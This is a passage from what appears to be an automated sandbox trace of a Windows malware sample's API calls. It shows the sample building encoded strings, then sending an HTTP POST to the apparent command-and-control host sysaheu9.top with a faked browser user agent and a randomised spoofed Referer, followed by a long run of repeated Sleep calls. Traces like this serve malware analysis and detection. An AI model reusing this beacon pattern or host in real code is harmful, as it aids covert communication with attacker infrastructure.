Seed=0x2830e9e) returned 0x2165976f [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x55e62737 [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x243de13e [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe0657433 [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x61ebe94b [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb8e54ae2 [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8a0c7964 [0196.290] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x174) returned 0x7d419a0 [0196.290] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0196.290] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0196.290] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0196.290] lstrcatA (in: lpString1="", lpString2="X&AO$cM&H9VZ.1sIE8KAH]<7B>?qo`JQ!nL4b+Qn?i=XT;@N'C4WH\\(``Wr/9nRaCNHu/Wj.FAn&yr\\\\V6%81wn(wB,LpZ=bq1z#$=$E@lK^9N[pb),&RwPeIyl-c_N^!ewYV,_y,<5o'PJV_L>'r,`wy?[UK@M;x%q-gV7=VERV)=X@k@.\"JTpuxvew:rgk,Kx]%:ijX1H]`JQ!nL4b+Qn?i=XT;@N'C4WH\\(``Wr/9nRaCNHu/Wj.FAn&yr\\\\V6%81wn(wB,LpZ=bq1z#$=$E@lK^9N[pb),&RwPeIyl-c_N^!ewYV,_y,<5o'PJV_L>'r,`wy?[UK@M;x%q-gV7=VERV)=X@k@.\"JTpuxvew:rgk,Kx]%:ijX1H]`JQ!nL4b+Qn?i=XT;@N'C4WH\\(``Wr/9nRaCNHu/Wj.FAn&yr\\\\V6%81wn(wB,LpZ=bq1z#$=$E@lK^9N[pb),&RwPeIyl-c_N^!ewYV,_y,<5o'PJV_L>'r,`wy?[UK@M;x%q-gV7=VERV)=X@k@.\"JTpuxvew:rgk,Kx]%:ijX1H]*?Px*p8j<]r691R75Tig*(iEm`b?mEu:;*ClpX).O>*^(&'4WXEvLte7BGU]pKDyV([,bQ1>F8+$b&N\".9YQN^'CK*Etyrqc7@_RX:a*?Px*p8j<]r691R75Tig*(iEm`b?mEu:;*ClpX).O>*^(&'4WXEvLte7BGU]pKDyV([,bQ1>F8+$b&N\".9YQN^'CK*Etyrqc7@_RX:a*?Px*p8j<]r691R75Tig*(iEm`b?mEu:;*ClpX).O>*^(&'4WXEvLte7BGU]pKDyV([,bQ1>F8+$b&N\".9YQN^'CK*Etyrqc7@_RX:a\"`Ua/#w'P$vg'S(J_L3!R1D0O\"rvv>s;F[rjm:g$3?%UV)^w^*uV0b&QK&&uj+jzWR*)v$Q\"0'=0FTOA!L*_/I'7T2oGS2Fp?duNnzQk5X4;1Sqo;]F2\"ya]?jsrkO" | out: lpString1="l\"`Ua/#w'P$vg'S(J_L3!R1D0O\"rvv>s;F[rjm:g$3?%UV)^w^*uV0b&QK&&uj+jzWR*)v$Q\"0'=0FTOA!L*_/I'7T2oGS2Fp?duNnzQk5X4;1Sqo;]F2\"ya]?jsrkO") returned="l\"`Ua/#w'P$vg'S(J_L3!R1D0O\"rvv>s;F[rjm:g$3?%UV)^w^*uV0b&QK&&uj+jzWR*)v$Q\"0'=0FTOA!L*_/I'7T2oGS2Fp?duNnzQk5X4;1Sqo;]F2\"ya]?jsrkO" [0288.089] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10c) returned 0x7d41b00 [0288.089] lstrlenA (lpString="http://sysaheu9.top/") returned 20 [0288.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7d41840, cbMultiByte=21, lpWideCharStr=0x7d41b00, cchWideChar=42 | out: lpWideCharStr="http://sysaheu9.top/") returned 21 [0288.089] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1026fc18 | out: pProxyConfig=0x1026fc18) returned 1 [0288.100] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xac77300 [0288.100] WinHttpCrackUrl (in: pwszUrl="http://sysaheu9.top/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1026fcd0 | out: lpUrlComponents=0x1026fcd0) returned 1 [0288.100] WinHttpConnect (hSession=0xac77300, pswzServerName="sysaheu9.top", nServerPort=0x50, dwReserved=0x0) returned 0x87738d0 [0288.100] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x12) returned 0x7d41c20 [0288.101] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x68) returned 0x7d41c40 [0288.101] WinHttpOpenRequest (hConnect=0x87738d0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa9efe30 [0288.101] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x4e) returned 0x7d41cb0 [0288.101] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10d) returned 0x7d41d10 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfe377ac [0288.101] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x12) returned 0x7d41e30 [0288.101] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x17) returned 0x7d41e50 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb92257b0 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8a43fc34 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5a6c59c3 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3878b142 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf0ca019 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x31fc80f7 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbde00453 [0288.101] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x55e189bb [0288.101] wsprintfW (in: param_1=0x7d41d10, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://jhthvut.net/") returned 41 [0288.101] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41e50) returned 0x17 [0288.101] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41e50) returned 1 [0288.101] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41e30) returned 0x12 [0288.101] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41e30) returned 1 [0288.101] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41cb0) returned 0x4e [0288.101] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41cb0) returned 1 [0288.102] WinHttpAddRequestHeaders (hRequest=0xa9efe30, pwszHeaders="Accept: */*\r\nReferer: http://jhthvut.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0288.102] WinHttpSendRequest (hRequest=0xa9efe30, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7d41990*, dwOptionalLength=0x158, dwTotalLength=0x158, dwContext=0x0) returned 0 [0288.106] WinHttpCloseHandle (hInternet=0xa9efe30) returned 1 [0288.106] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41d10) returned 0x10d [0288.106] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41d10) returned 1 [0288.106] WinHttpCloseHandle (hInternet=0x87738d0) returned 1 [0288.106] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41c40) returned 0x68 [0288.106] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41c40) returned 1 [0288.106] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41c20) returned 0x12 [0288.106] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41c20) returned 1 [0288.106] WinHttpCloseHandle (hInternet=0xac77300) returned 1 [0288.106] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41b00) returned 0x10c [0288.106] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41b00) returned 1 [0288.106] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41870) returned 0x112 [0288.106] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41870) returned 1 [0288.106] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41990) returned 0x161 [0288.106] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41990) returned 1 [0288.106] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x1d [0288.107] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0288.107] Sleep (dwMilliseconds=0x258) [0288.140] Sleep (dwMilliseconds=0x258) [0288.179] Sleep (dwMilliseconds=0x258) [0288.233] Sleep (dwMilliseconds=0x258) [0288.237] Sleep (dwMilliseconds=0x258) [0288.248] Sleep (dwMilliseconds=0x258) [0288.284] Sleep (dwMilliseconds=0x258) [0288.324] Sleep (dwMilliseconds=0x258) [0288.347] Sleep (dwMilliseconds=0x258) [0288.367] Sleep (dwMilliseconds=0x258) [0288.426] Sleep (dwMilliseconds=0x258) [0288.465] Sleep (dwMilliseconds=0x258) [0288.474] Sleep (dwMilliseconds=0x258) [0288.475] Sleep (dwMilliseconds=0x258) [0288.504] Sleep (dwMilliseconds=0x258) [0288.546] Sleep (dwMilliseconds=0x258) [0288.573] Sleep (dwMilliseconds=0x258) [0288.586] Sleep (dwMilliseconds=0x258) [0288.625] Sleep (dwMilliseconds=0x258) [0288.739] Sleep (dwMilliseconds=0x258) [0288.790] Sleep (dwMilliseconds=0x258) [0288.850] Sleep (dwMilliseconds=0x258) [0288.923] Sleep (dwMilliseconds=0x258) [0288.953] Sleep (dwMilliseconds=0x258) [0288.965] Sleep (dwMilliseconds=0x258) [0289.001] Sleep (dwMilliseconds=0x258) [0289.176] Sleep (dwMilliseconds=0x258) [0289.184] Sleep (dwMilliseconds=0x258) [0289.185] Sleep (dwMilliseconds=0x258) [0289.244] Sleep (dwMilliseconds=0x258) [0289.281] Sleep (dwMilliseconds=0x258) [0289.304] Sleep (dwMilliseconds=0x258) [0289.306] Sleep (dwMilliseconds=0x258) [0289.322] Sleep (dwMilliseconds=0x258) [0289.359] Sleep (dwMilliseconds=0x258) [0289.400] Sleep (dwMilliseconds=0x258) [0289.403] Sleep (dwMilliseconds=0x258) [0289.404] Sleep (dwMilliseconds=0x258) [0289.438] Sleep (dwMilliseconds=0x258) [0289.475] Sleep (dwMilliseconds=0x258) [0289.487] Sleep (dwMilliseconds=0x258) [0289.488] Sleep (dwMilliseconds=0x258) [0289.518] Sleep (dwMilliseconds=0x258) [0289.556] Sleep (dwMilliseconds=0x258) [0289.578] Sleep (dwMilliseconds=0x258) [0289.595] Sleep (dwMilliseconds=0x258) [0289.636] Sleep (dwMilliseconds=0x258) [0289.712] Sleep (dwMilliseconds=0x258) [0289.713] Sleep (dwMilliseconds=0x258) [0289.715] Sleep (dwMilliseconds=0x258) [0289.755] Sleep (dwMilliseconds=0x258) [0289.793] Sleep (dwMilliseconds=0x258) [0289.813] Sleep (dwMilliseconds=0x258) [0289.815] Sleep (dwMilliseconds=0x258) [0289.833] Sleep (dwMilliseconds=0x258) [0289.871] Sleep (dwMilliseconds=0x258) [0289.898] Sleep (dwMilliseconds=0x258) [0289.911] Sleep (dwMilliseconds=0x258) [0289.947] Sleep (dwMilliseconds=0x258) [0289.987] Sleep (dwMilliseconds=0x258) [0289.988] Sleep (dwMilliseconds=0x258) [0289.989] Sleep (dwMilliseconds=0x258) [0290.031] Sleep (dwMilliseconds=0x258) [0290.087] Sleep (dwMilliseconds=0x258) [0290.121] Sleep (dwMilliseconds=0x258) [0290.128] Sleep (dwMilliseconds=0x258) [0290.168] Sleep (dwMilliseconds=0x258) [0290.226] Sleep (dwMilliseconds=0x258) [0290.254] Sleep (dwMilliseconds=0x258) [0290.269] Sleep (dwMilliseconds=0x258) [0290.306] Sleep (dwMilliseconds=0x258) [0290.345] Sleep (dwMilliseconds=0x258) [0290.365] Sleep (dwMilliseconds=0x258) [0290.368] Sleep (dwMilliseconds=0x258) [0290.390] Sleep (dwMilliseconds=0x258) [0290.428] Sleep (dwMilliseconds=0x258) [0290.465] Sleep (dwMilliseconds=0x258) [0290.470] Sleep (dwMilliseconds=0x258) [0290.504] Sleep (dwMilliseconds=0x258) [0290.540] Sleep (dwMilliseconds=0x258) [0290.550] Sleep (dwMilliseconds=0x258) [0290.579] Sleep (dwMilliseconds=0x258) [0290.615] Sleep (dwMilliseconds=0x258) [0290.630] Sleep (dwMilliseconds=0x258) [0290.631] Sleep (dwMilliseconds=0x258) [0290.653] Sleep (dwMilliseconds=0x258) [0290.697] Sleep (dwMilliseconds=0x258) [0290.735] Sleep (dwMilliseconds=0x258) [0290.737] Sleep (dwMilliseconds=0x258) [0290.738] Sleep (dwMilliseconds=0x258) [0290.775] Sleep (dwMilliseconds=0x258) [0290.813] Sleep (dwMilliseconds=0x258) [0290.824] Sleep (dwMilliseconds=0x258) [0290.825] Sleep (dwMilliseconds=0x258) [0290.852] Sleep (dwMilliseconds=0x258) [0290.894] Sleep (dwMilliseconds=0x258) [0290.920] Sleep (dwMilliseconds=0x258) [0290.923] Sleep (dwMilliseconds=0x258) [0290.934] Sleep (dwMilliseconds=0x258) [0290.969] Sleep (dwMilliseconds=0x258) [0291.007] Sleep (dwMilliseconds=0x258) [0291.009] Sleep (dwMilliseconds=0x258) [0291.062] Sleep (dwMilliseconds=0x258) [0291.103] Sleep (dwMilliseconds=0x258) [0291.116] Sleep (dwMilliseconds=0x258) [0291.118] Sleep (dwMilliseconds=0x258) [0291.143] Sleep (dwMilliseconds=0x258) [0291.182] Sleep (dwMilliseconds=0x258) [0291.244] Sleep (dwMilliseconds=0x258) [0291.250] Sleep (dwMilliseconds=0x258) [0291.287] Sleep (dwMilliseconds=0x258) [0291.334] Sleep (dwMilliseconds=0x258) [0291.351] Sleep (dwMilliseconds=0x258) [0291.381] Sleep (dwMilliseconds=0x258) [0291.419] Sleep (dwMilliseconds=0x258) [0291.563] Sleep (dwMilliseconds=0x258) [0291.566] Sleep (dwMilliseconds=0x258) [0291.607] Sleep (dwMilliseconds=0x258) [0291.644] Sleep (dwMilliseconds=0x258) [0291.657] Sleep (dwMilliseconds=0x258) [0291.699] Sleep (dwMilliseconds=0x258) [0291.742] Sleep (dwMilliseconds=0x258) [0291.766] Sleep (dwMilliseconds=0x258) [0291.782] Sleep (dwMilliseconds=0x258) [0291.821] Sleep (dwMilliseconds=0x258) [0291.862] Sleep (dwMilliseconds=0x258) [0291.868] Sleep (dwMilliseconds=0x258) [0291.869] Sleep (dwMilliseconds=0x258) [0291.901] Sleep (dwMilliseconds=0x258) [0291.941] Sleep (dwMilliseconds=0x258) [0291.958] Sleep (dwMilliseconds=0x258) [0291.960] Sleep (dwMilliseconds=0x258) [0291.982] Sleep (dwMilliseconds=0x258) [0292.018] Sleep (dwMilliseconds=0x258) [0292.048] Sleep (dwMilliseconds=0x258) [0292.069] Sleep (dwMilliseconds=0x258) [0292.107] Sleep (dwMilliseconds=0x258) [0292.148] Sleep (dwMilliseconds=0x258) [0292.187] Sleep (dwMilliseconds=0x258) [0292.279] Sleep (dwMilliseconds=0x258) [0292.319] Sleep (dwMilliseconds=0x258) [0292.358] Sleep (dwMilliseconds=0x258) [0292.394] Sleep (dwMilliseconds=0x258) [0292.395] Sleep (dwMilliseconds=0x258) [0292.399] Sleep (dwMilliseconds=0x258) [0292.441] Sleep (dwMilliseconds=0x258) [0292.480] Sleep (dwMilliseconds=0x258) [0292.522] Sleep (dwMilliseconds=0x258) [0292.562] Sleep (dwMilliseconds=0x258) [0292.599] Sleep (dwMilliseconds=0x258) [0292.642] Sleep (dwMilliseconds=0x258) [0292.679] Sleep (dwMilliseconds=0x258) [0292.758] Sleep (dwMilliseconds=0x258) [0292.776] Sleep (dwMilliseconds=0x258) [0292.799] Sleep (dwMilliseconds=0x258) [0292.836] Sleep (dwMilliseconds=0x258) [0292.875] Sleep (dwMilliseconds=0x258) [0292.913] Sleep (dwMilliseconds=0x258) [0292.923] Sleep (dwMilliseconds=0x258) [0292.954] Sleep (dwMilliseconds=0x258) [0292.991] Sleep (dwMilliseconds=0x258) [0293.012] Sleep (dwMilliseconds=0x258) [0293.030] Sleep (dwMilliseconds=0x258) [0293.092] Sleep (dwMilliseconds=0x258) [0293.160] Sleep (dwMilliseconds=0x258) [0293.172] Sleep (dwMilliseconds=0x258) [0293.173] Sleep (dwMilliseconds=0x258) [0293.233] Sleep (dwMilliseconds=0x258) [0293.272] Sleep (dwMilliseconds=0x258) [0293.295] Sleep (dwMilliseconds=0x258) [0293.299] Sleep (dwMilliseconds=0x258) [0293.313] Sleep (dwMilliseconds=0x258) [0293.349] Sleep (dwMilliseconds=0x258) [0293.386] Sleep (dwMilliseconds=0x258) [0293.389] Sleep (dwMilliseconds=0x258) [0293.426] Sleep (dwMilliseconds=0x258) [0293.467] Sleep (dwMilliseconds=0x258) [0293.496] Sleep (dwMilliseconds=0x258) [0293.507] Sleep (dwMilliseconds=0x258) [0293.545] Sleep (dwMilliseconds=0x258) [0293.585] Sleep (dwMilliseconds=0x258) [0293.609] Sleep (dwMilliseconds=0x258) [0293.612] Sleep (dwMilliseconds=0x258) [0293.627] Sleep (dwMilliseconds=0x258) [0293.666] Sleep (dwMilliseconds=0x258) [0293.705] Sleep (dwMilliseconds=0x258) [0293.726] Sleep (dwMilliseconds=0x258) [0293.729] Sleep (dwMilliseconds=0x258) [0293.770] Sleep (dwMilliseconds=0x258) [0293.811] Sleep (dwMilliseconds=0x258) [0293.850] Sleep (dwMilliseconds=0x258) [0293.860] Sleep (dwMilliseconds=0x258) [0293.861] Sleep (dwMilliseconds=0x258) [0293.890] Sleep (dwMilliseconds=0x258) [0293.928] Sleep (dwMilliseconds=0x258) [0293.956] Sleep (dwMilliseconds=0x258) [0293.959] Sleep (dwMilliseconds=0x258) [0293.968] Sleep (dwMilliseconds=0x258) [0294.005] Sleep (dwMilliseconds=0x258) [0294.043] Sleep (dwMilliseconds=0x258) [0294.051] Sleep (dwMilliseconds=0x258) [0294.053] Sleep (dwMilliseconds=0x258) [0294.089] Sleep (dwMilliseconds=0x258) [0294.127] Sleep (dwMilliseconds=0x258) [0294.166] Sleep (dwMilliseconds=0x258) [0294.170] Sleep (dwMilliseconds=0x258) [0294.234] Sleep (dwMilliseconds=0x258) [0294.276] Sleep (dwMilliseconds=0x258) [0294.289] Sleep (dwMilliseconds=0x258) [0294.290] Sleep (dwMilliseconds=0x258) [0294.318] Sleep (dwMilliseconds=0x258) [0294.354] Sleep (dwMilliseconds=0x258) [0294.381] Sleep (dwMilliseconds=0x258) [0294.382] Sleep (dwMilliseconds=0x258) [0294.395] Sleep (dwMilliseconds=0x258) [0294.430] Sleep (dwMilliseconds=0x258) [0294.466] Sleep (dwMilliseconds=0x258) [0294.468] Sleep (dwMilliseconds=0x258) [0294.471] Sleep (dwMilliseconds=0x258) [0294.508] Sleep (dwMilliseconds=0x258) [0294.547] Sleep (dwMilliseconds=0x258) [0294.554] Sleep (dwMilliseconds=0x258) [0294.556] Sleep (dwMilliseconds=0x258) [0294.587] Sleep (dwMilliseconds=0x258) [0294.625] Sleep (dwMilliseconds=0x258) [0294.675] Sleep (dwMilliseconds=0x258) [0294.678] Sleep (dwMilliseconds=0x258) [0294.703] Sleep (dwMilliseconds=0x258) [0294.741] Sleep (dwMilliseconds=0x258) [0294.772] Sleep (dwMilliseconds=0x258) [0294.773] Sleep (dwMilliseconds=0x258) [0294.785] Sleep (dwMilliseconds=0x258) [0294.821] Sleep (dwMilliseconds=0x258) [0294.859] Sleep (dwMilliseconds=0x258) [0294.866] Sleep (dwMilliseconds=0x258) [0294.868] Sleep (dwMilliseconds=0x258) [0294.900] Sleep (dwMilliseconds=0x258) [0294.938] Sleep (dwMilliseconds=0x258) [0294.963] Sleep (dwMilliseconds=0x258) [0294.978] Sleep (dwMilliseconds=0x258) [0295.136] Sleep (dwMilliseconds=0x258) [0295.168] Sleep (dwMilliseconds=0x258) [0295.169] Sleep (dwMilliseconds=0x258) [0295.174] Sleep (dwMilliseconds=0x258) [0295.234] Sleep (dwMilliseconds=0x258) [0295.292] Sleep (dwMilliseconds=0x258) [0295.298] Sleep (dwMilliseconds=0x258) [0295.299] Sleep (dwMilliseconds=0x258) [0295.336] Sleep (dwMilliseconds=0x258) [0295.373] Sleep (dwMilliseconds=0x258) [0295.416] Sleep (dwMilliseconds=0x258) [0295.419] Sleep (dwMilliseconds=0x258) [0295.456] Sleep (dwMilliseconds=0x258) [0295.496] Sleep (dwMilliseconds=0x258) [0295.529] Sleep (dwMilliseconds=0x258) [0295.538] Sleep (dwMilliseconds=0x258) [0295.575] Sleep (dwMilliseconds=0x258) [0295.612] Sleep (dwMilliseconds=0x258) [0295.631] Sleep (dwMilliseconds=0x258) [0295.651] Sleep (dwMilliseconds=0x258) [0295.686] Sleep (dwMilliseconds=0x258) [0295.714] Sleep (dwMilliseconds=0x258) [0295.729] Sleep (dwMilliseconds=0x258) [0295.765] Sleep (dwMilliseconds=0x258) [0295.813] Sleep (dwMilliseconds=0x258) [0295.821] Sleep (dwMilliseconds=0x258) [0295.823] Sleep (dwMilliseconds=0x258) [0295.853] Sleep (dwMilliseconds=0x258) [0295.890] Sleep (dwMilliseconds=0x258) [0295.915] Sleep (dwMilliseconds=0x258) [0295.933] Sleep (dwMilliseconds=0x258) [0295.972] Sleep (dwMilliseconds=0x258) [0296.012] Sleep (dwMilliseconds=0x258) [0296.023] Sleep (dwMilliseconds=0x258) [0296.054] Sleep (dwMilliseconds=0x258) [0296.099] Sleep (dwMilliseconds=0x258) [0296.135] Sleep (dwMilliseconds=0x258) [0296.136] Sleep (dwMilliseconds=0x258) [0296.142] Sleep (dwMilliseconds=0x258) [0296.235] Sleep (dwMilliseconds=0x258) [0296.273] Sleep (dwMilliseconds=0x258) [0296.295] Sleep (dwMilliseconds=0x258) [0296.297] Sleep (dwMilliseconds=0x258) [0296.316] Sleep (dwMilliseconds=0x258) [0296.356] Sleep (dwMilliseconds=0x258) [0296.394] Sleep (dwMilliseconds=0x258) [0296.396] Sleep (dwMilliseconds=0x258) [0296.397] Sleep (dwMilliseconds=0x258) [0296.431] Sleep (dwMilliseconds=0x258) [0296.469] Sleep (dwMilliseconds=0x258) [0296.493] Sleep (dwMilliseconds=0x258) [0296.508] Sleep (dwMilliseconds=0x258) [0296.549] Sleep (dwMilliseconds=0x258) [0296.587] Sleep (dwMilliseconds=0x258) [0296.602] Sleep (dwMilliseconds=0x258) [0296.604] Sleep (dwMilliseconds=0x258) [0296.626] Sleep (dwMilliseconds=0x258) [0296.664] Sleep (dwMilliseconds=0x258) [0296.701] Sleep (dwMilliseconds=0x258) [0296.706] Sleep (dwMilliseconds=0x258) [0296.738] Sleep (dwMilliseconds=0x258) [0296.777] Sleep (dwMilliseconds=0x258) [0296.804] Sleep (dwMilliseconds=0x258) [0296.822] Sleep (dwMilliseconds=0x258) [0296.859] Sleep (dwMilliseconds=0x258) [0296.898] Sleep (dwMilliseconds=0x258) [0296.909] Sleep (dwMilliseconds=0x258) [0296.911] Sleep (dwMilliseconds=0x258) [0296.936] Sleep (dwMilliseconds=0x258) [0296.976] Sleep (dwMilliseconds=0x258) [0297.013] Sleep (dwMilliseconds=0x258) [0297.051] Sleep (dwMilliseconds=0x258) [0297.099] Sleep (dwMilliseconds=0x258) [0297.122] Sleep (dwMilliseconds=0x258) [0297.142] Sleep (dwMilliseconds=0x258) [0297.177] Sleep (dwMilliseconds=0x258) [0297.237] Sleep (dwMilliseconds=0x258) [0297.251] Sleep (dwMilliseconds=0x258) [0297.278] Sleep (dwMilliseconds=0x258) [0297.318] Sleep (dwMilliseconds=0x258) [0297.352] Sleep (dwMilliseconds=0x258) [0297.353] Sleep (dwMilliseconds=0x258) [0297.357] Sleep (dwMilliseconds=0x258) [0297.409] Sleep (dwMilliseconds=0x258) [0297.453] Sleep (dwMilliseconds=0x258) [0297.477] Sleep (dwMilliseconds=0x258) [0297.479] Sleep (dwMilliseconds=0x258) [0297.494] Sleep (dwMilliseconds=0x258) [0297.531] Sleep (dwMilliseconds=0x258) [0297.562] Sleep (dwMilliseconds=0x258) [0297.563] Sleep (dwMilliseconds=0x258) [0297.568] Sleep (dwMilliseconds=0x258) [0297.605] Sleep (dwMilliseconds=0x258) [0297.642] Sleep (dwMilliseconds=0x258) [0297.647] Sleep (dwMilliseconds=0x258) [0297.649] Sleep (dwMilliseconds=0x258) [0297.681] Sleep (dwMilliseconds=0x258) [0297.721] Sleep (dwMilliseconds=0x258) [0297.740] Sleep (dwMilliseconds=0x258) [0297.742] Sleep (dwMilliseconds=0x258) [0297.765] Sleep (dwMilliseconds=0x258) [0297.800] Sleep (dwMilliseconds=0x258) [0297.828] Sleep (dwMilliseconds=0x258) [0297.855] Sleep (dwMilliseconds=0x258) [0297.894] Sleep (dwMilliseconds=0x258) [0297.932] Sleep (dwMilliseconds=0x258) [0297.934] Sleep (dwMilliseconds=0x258) [0297.936] Sleep (dwMilliseconds=0x258) [0297.978] Sleep (dwMilliseconds=0x258) [0298.032] Sleep (dwMilliseconds=0x258) [0298.065] Sleep (dwMilliseconds=0x258) [0298.086] Sleep (dwMilliseconds=0x258) [0298.123] Sleep (dwMilliseconds=0x258) [0298.152] Sleep (dwMilliseconds=0x258) [0298.156] Sleep (dwMilliseconds=0x258) [0298.166] Sleep (dwMilliseconds=0x258) [0298.224] Sleep (dwMilliseconds=0x258) [0298.261] Sleep (dwMilliseconds=0x258) [0298.269] Sleep (dwMilliseconds=0x258) [0298.270] Sleep (dwMilliseconds=0x258) [0298.298] Sleep (dwMilliseconds=0x258) [0298.339] Sleep (dwMilliseconds=0x258) [0298.354] Sleep (dwMilliseconds=0x258) [0298.376] Sleep (dwMilliseconds=0x258) [0298.412] Sleep (dwMilliseconds=0x258) [0298.458] Sleep (dwMilliseconds=0x258) [0298.459] Sleep (dwMilliseconds=0x258) [0298.461] Sleep (dwMilliseconds=0x258) [0298.499] Sleep (dwMilliseconds=0x258) [0298.541] Sleep (dwMilliseconds=0x258) [0298.563] Sleep (dwMilliseconds=0x258) [0298.567] Sleep (dwMilliseconds=0x258) [0298.590] Sleep (dwMilliseconds=0x258) [0298.627] Sleep (dwMilliseconds=0x258) [0298.663] Sleep (dwMilliseconds=0x258) [0298.667] Sleep (dwMilliseconds=0x258) [0298.702] Sleep (dwMilliseconds=0x258) [0298.741] Sleep (dwMilliseconds=0x258) [0298.750] Sleep (dwMilliseconds=0x258) [0298.752] Sleep (dwMilliseconds=0x258) [0298.781] Sleep (dwMilliseconds=0x258) [0298.819] Sleep (dwMilliseconds=0x258) [0298.839] Sleep (dwMilliseconds=0x258) [0298.841] Sleep (dwMilliseconds=0x258) [0298.863] Sleep (dwMilliseconds=0x258) [0298.900] Sleep (dwMilliseconds=0x258) [0298.925] Sleep (dwMilliseconds=0x258) [0298.939] Sleep (dwMilliseconds=0x258) [0298.977] Sleep (dwMilliseconds=0x258) [0299.010] Sleep (dwMilliseconds=0x258) [0299.011] Sleep (dwMilliseconds=0x258) [0299.015] Sleep (dwMilliseconds=0x258) [0299.053] Sleep (dwMilliseconds=0x258) [0299.102] Sleep (dwMilliseconds=0x258) [0299.140] Sleep (dwMilliseconds=0x258) [0299.164] Sleep (dwMilliseconds=0x258) [0299.224] Sleep (dwMilliseconds=0x258) [0299.256] Sleep (dwMilliseconds=0x258) [0299.258] Sleep (dwMilliseconds=0x258) [0299.265] Sleep (dwMilliseconds=0x258) [0299.302] Sleep (dwMilliseconds=0x258) [0299.345] Sleep (dwMilliseconds=0x258) [0299.349] Sleep (dwMilliseconds=0x258) [0299.365] Sleep (dwMilliseconds=0x258) [0299.401] Sleep (dwMilliseconds=0x258) [0299.440] Sleep (dwMilliseconds=0x258) [0299.467] Sleep (dwMilliseconds=0x258) [0299.480] Sleep (dwMilliseconds=0x258) [0299.516] Sleep (dwMilliseconds=0x258) [0299.552] Sleep (dwMilliseconds=0x258) [0299.555] Sleep (dwMilliseconds=0x258) [0299.593] Sleep (dwMilliseconds=0x258) [0299.631] Sleep (dwMilliseconds=0x258) [0299.648] Sleep (dwMilliseconds=0x258) [0299.671] Sleep (dwMilliseconds=0x258) [0299.711] Sleep 